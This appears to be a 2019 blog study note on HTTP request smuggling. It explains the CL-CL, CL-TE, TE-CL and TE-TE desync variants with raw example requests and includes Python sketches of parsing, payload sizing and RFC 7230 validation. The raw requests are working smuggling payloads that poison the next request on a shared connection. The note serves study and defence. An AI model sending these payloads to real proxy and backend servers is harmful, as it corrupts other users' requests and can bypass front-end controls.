Notes on HTTP Smuggling Attacks

 2019/12/18

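Preface

The figure below gives an intuitive picture of the various attack types, but it is still worth reading the original article carefully and in full.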

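Cause

Two HTTP/1.1 features are involved: Keep-Alive and pipelining.

This attack mostly arises between a proxy and the backend.

The proxy has to fetch large amounts of data from the backend, and the two endpoints are relatively fixed, so a persistent TCP connection is an effective way to cut overhead and speed up access.
The proxy (acting as the client) may have many requests in flight at once and cannot wait for the server to answer one before sending the next, so it uses pipelining (first in, first out) to submit requests in a batch without waiting for the responses.

Now consider: given these two features, could one request contaminate another?

i. Persistent connections

In HTTP/1.1 all connections are persistent by default unless declared otherwise (for example with Connection: close).

ii. Pipelining

HTTP pipelining depends on support from both the client and the server. Servers that conform to HTTP/1.1 support pipelining. This does not mean the server must pipeline its responses, only that it must not fail when it receives pipelined requests.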
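
To make the risk concrete: on a persistent, pipelined connection the receiver sees one continuous byte stream and has to find the request boundaries itself. The following is a minimal sketch, assuming body-less requests only; `split_pipelined` is a hypothetical helper, not part of any real server.

```python
def split_pipelined(buffer: bytes) -> list:
    """Split a stream of body-less requests on the blank line that ends each header block."""
    requests = []
    while buffer:
        head, sep, buffer = buffer.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete request: a real server would wait for more bytes
        requests.append(head + sep)
    return requests


# Two requests sent back to back on the same connection.
stream = (
    b"GET /a HTTP/1.1\r\nHost: example.com\r\n\r\n"
    b"GET /b HTTP/1.1\r\nHost: example.com\r\n\r\n"
)
parts = split_pipelined(stream)
```

Once requests carry bodies, the boundary depends on Content-Length or Transfer-Encoding, and that is where two parsers can disagree.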

Types

CL = Content-Length
TE = Transfer-Encoding

CL-CL

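According to RFC 7230, a request that carries no Transfer-Encoding and two Content-Length headers with differing values must be rejected outright with a 400 error.

The problem arises when the frontend and backend do not strictly follow this rule, and the proxy and the backend each honor a different one of the CL headers depending on the order in which they parse them.

Take the following request: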

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n <- Frontend sees this
Content-Length: 5\r\n <- Backend sees this
\r\n
12345G

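The frontend (proxy) reads a length of 6 and forwards the whole request above to the backend server.
The backend reads a length of 5, consumes 5 characters, and leaves the remainder in its buffer, treating G as the beginning of the next request.
When the next request reaches the backend, the backend reads from the buffer first, and the request is poisoned: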

GPOST / HTTP/1.1\r\n
Host: example.com

Combined effect of the two requests

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n       <- Frontend sees this
Content-Length: 5\r\n       <- Backend sees this
\r\n
12345GPOST / HTTP/1.1\r\n
Host: example.com

---

Response : Unknown method GPOST
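
The CL-CL disagreement can be reproduced offline. This is a minimal sketch, assuming the frontend honors the first Content-Length header and the backend the last one; `read_body` is a hypothetical helper, and real servers differ in which header they pick.

```python
def read_body(raw: bytes, pick: str):
    """Return (body, leftover), using the first or the last Content-Length header."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lengths = [
        int(line.split(b":", 1)[1].strip())
        for line in head.split(b"\r\n")[1:]  # skip the request line
        if line.lower().startswith(b"content-length:")
    ]
    n = lengths[0] if pick == "first" else lengths[-1]
    return rest[:n], rest[n:]


raw = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 6\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"12345G"
)
front_body, front_left = read_body(raw, "first")  # frontend: forwards everything
back_body, back_left = read_body(raw, "last")     # backend: one byte stays in the buffer

# The leftover byte is prepended to whatever arrives next on the connection.
next_request = back_left + b"POST / HTTP/1.1\r\nHost: example.com\r\n\r\n"
```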

CL-TE

The frontend honors CL; the backend honors TE.

The most common TE value is, of course, chunked (chunked transfer coding).

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n           <- Frontend sees this
Transfer-Encoding: chunked\r\n  <- Backend sees this
\r\n
0\r\n
\r\n
GPOST / HTTP/1.1

---

Response : Unknown method GPOST

Because the frontend parses by CL, it treats the following 6 bytes as the request body:
```
 0\r\n
 \r\n
 G
```
The backend parses by TE and treats 0\r\n\r\n as the end of the body, so everything after it belongs to the next request.
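
The two views of the same body can be compared side by side. A minimal sketch, assuming no chunk extensions beyond a `;` suffix and no trailer fields; `chunked_end` is a hypothetical helper written for illustration.

```python
def chunked_end(body: bytes) -> int:
    """Return the offset just past the terminating zero-size chunk (no trailers assumed)."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # chunk size is hexadecimal
        pos = eol + 2
        if size == 0:
            return body.index(b"\r\n", pos) + 2  # the empty line closing the body
        pos += size + 2  # chunk data plus its trailing CRLF


body = b"0\r\n\r\nG"

frontend_body = body[:6]             # frontend: Content-Length: 6
end = chunked_end(body)              # backend: stops after 0\r\n\r\n
backend_body, leftover = body[:end], body[end:]
```

Here `leftover` is the single byte that the backend keeps in its buffer and glues onto the next request.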

TE-CL

The frontend honors TE; the backend honors CL.

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 3\r\n           <- Backend sees this
Transfer-Encoding: chunked\r\n  <- Frontend sees this
\r\n
6\r\n
PREFIX\r\n
0\r\n
\r\n

POST / HTTP/1.1\r\n
Host: example.com
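
A short sketch of what each side does with this body, assuming the frontend decodes the chunks and the backend simply reads Content-Length: 3 bytes; the variable names are illustrative only.

```python
body = b"6\r\nPREFIX\r\n0\r\n\r\n"
next_request = b"POST / HTTP/1.1\r\nHost: example.com\r\n\r\n"

# Frontend (TE): the body runs up to and including the zero-size chunk,
# so the whole thing is forwarded as one request.
frontend_forwards_all = body.endswith(b"0\r\n\r\n")

# Backend (CL: 3): only the first three bytes, "6\r\n", belong to this request.
backend_body, leftover = body[:3], body[3:]

# Everything else is left in the buffer and prefixes the next request.
poisoned = leftover + next_request
```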

TE-TE

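In the double-TE case, one of the TE headers is deliberately malformed, so that either the frontend or the backend fails to parse it, ignores TE, and falls back to CL. In practice this reduces to TE-CL or CL-TE; the telltale sign is a request with one CL header and two TE headers.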

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-Encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

As shown below, the second TE is invalid, so this is effectively TE-CL:

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n           <- Backend sees this second
Transfer-Encoding: chunked\r\n  <- Frontend sees this
Transfer-Encoding: cow\r\n      <- Backend sees this first and ignores it
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

The frontend parses by TE and treats everything below as valid body data:

 5c\r\n
 GPOST / HTTP/1.1\r\n
 Content-Type: application/x-www-form-urlencoded\r\n
 Content-Length: 15\r\n
 \r\n
 x=1\r\n
 0\r\n
 \r\n

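The backend tries TE first, but the TE value is invalid, so it ignores the TE header and parses by CL instead. Since the length is 4, it treats 5c\r\n as the entire body of this request, and everything after it as the next request.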
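
The two numbers in this payload (chunk size 5c and Content-length: 4) are not arbitrary, and they are easy to get wrong by hand. A minimal sketch that derives both from the smuggled request; the variable names are illustrative only.

```python
# The request hidden inside the chunk (the chunk data ends at "x=1").
smuggled = (
    b"GPOST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    b"x=1"
)

# Chunk size line: the length of the chunk data in hexadecimal, followed by CRLF.
size_line = format(len(smuggled), "x").encode() + b"\r\n"

# Full chunked body as the frontend sees it.
body = size_line + smuggled + b"\r\n0\r\n\r\n"

# The outer Content-Length must cover exactly the chunk size line,
# so that the backend stops right before the smuggled request.
outer_content_length = len(size_line)
```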

Forcing desync

RFC 7230, Section 3.3.3 contains the following; I think it is best quoted in full:

3.    If a Transfer-Encoding header field is present and the chunked
    transfer coding (Section 4.1) is the final encoding, the message
    body length is determined by reading and decoding the chunked
    data until the transfer coding indicates the data is complete.

    If a Transfer-Encoding header field is present in a response and
    the chunked transfer coding is not the final encoding, the
    message body length is determined by reading the connection until
    it is closed by the server.  If a Transfer-Encoding header field
    is present in a request and the chunked transfer coding is not
    the final encoding, the message body length cannot be determined
    reliably; the server MUST respond with the 400 (Bad Request)
    status code and then close the connection.

    If a message is received with both a Transfer-Encoding and a
    Content-Length header field, the Transfer-Encoding overrides the
    Content-Length.  Such a message might indicate an attempt to
    perform request smuggling (Section 9.5) or response splitting
    (Section 9.4) and ought to be handled as an error.  A sender MUST
    remove the received Content-Length field prior to forwarding such
    a message downstream.
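
The rule quoted above can be sketched as a small decision function for requests. This is an illustration under stated assumptions, not any real server's logic: `request_framing` is a hypothetical name, headers are given as (name, value) pairs, and the check for conflicting Content-Length values comes from the next item of the same RFC section rather than from the quoted text.

```python
def request_framing(headers):
    """Decide how a request body is delimited.

    Returns "chunked", "content-length", "no-body", or "400".
    """
    te = [v for k, v in headers if k.lower() == "transfer-encoding"]
    cl = [v.strip() for k, v in headers if k.lower() == "content-length"]
    if te:
        # Repeated TE headers are read as one comma-separated list of codings.
        codings = [c.strip().lower() for v in te for c in v.split(",") if c.strip()]
        if not codings or codings[-1] != "chunked":
            return "400"   # final coding is not chunked: length cannot be determined
        return "chunked"   # Transfer-Encoding overrides any Content-Length
    if len(set(cl)) > 1:
        return "400"       # conflicting Content-Length values
    return "content-length" if cl else "no-body"


te_te = [
    ("Host", "example.com"),
    ("Content-length", "4"),
    ("Transfer-Encoding", "chunked"),
    ("Transfer-Encoding", "cow"),
]
cl_te = [("Content-Length", "6"), ("Transfer-Encoding", "chunked")]
cl_cl = [("Content-Length", "6"), ("Content-Length", "5")]
```

A parser that follows this logic rejects the TE-TE and CL-CL samples and never falls back to Content-Length when Transfer-Encoding is present, which is exactly the fallback the attacks rely on.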

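In practice, because we are deliberately corrupting the request stream, it is easy to trigger a 400 error whenever either the proxy or the backend server validates the chunk lengths.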
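
As a rough illustration of such a check, the sketch below validates a complete body against chunked framing and answers 400 on any mismatch. `validate_chunked` is a hypothetical helper; it assumes no chunk extensions or trailers, and Python's `int()` is more lenient about the size field than a strict parser would be.

```python
def validate_chunked(body: bytes) -> int:
    """Return 200 if body is well-formed chunked data with nothing after it, else 400."""
    pos = 0
    try:
        while True:
            eol = body.index(b"\r\n", pos)
            size = int(body[pos:eol], 16)
            if size < 0:
                return 400
            pos = eol + 2
            if size == 0:
                break
            if body[pos + size:pos + size + 2] != b"\r\n":
                return 400  # declared size does not match the chunk data
            pos += size + 2
    except ValueError:
        return 400  # missing CRLF or a size that is not hexadecimal
    # Only the final empty line may follow the zero-size chunk.
    return 200 if body[pos:] == b"\r\n" else 400


ok = validate_chunked(b"6\r\nPREFIX\r\n0\r\n\r\n")
wrong_size = validate_chunked(b"5\r\nPREFIX\r\n0\r\n\r\n")
trailing_data = validate_chunked(b"0\r\n\r\nG")
```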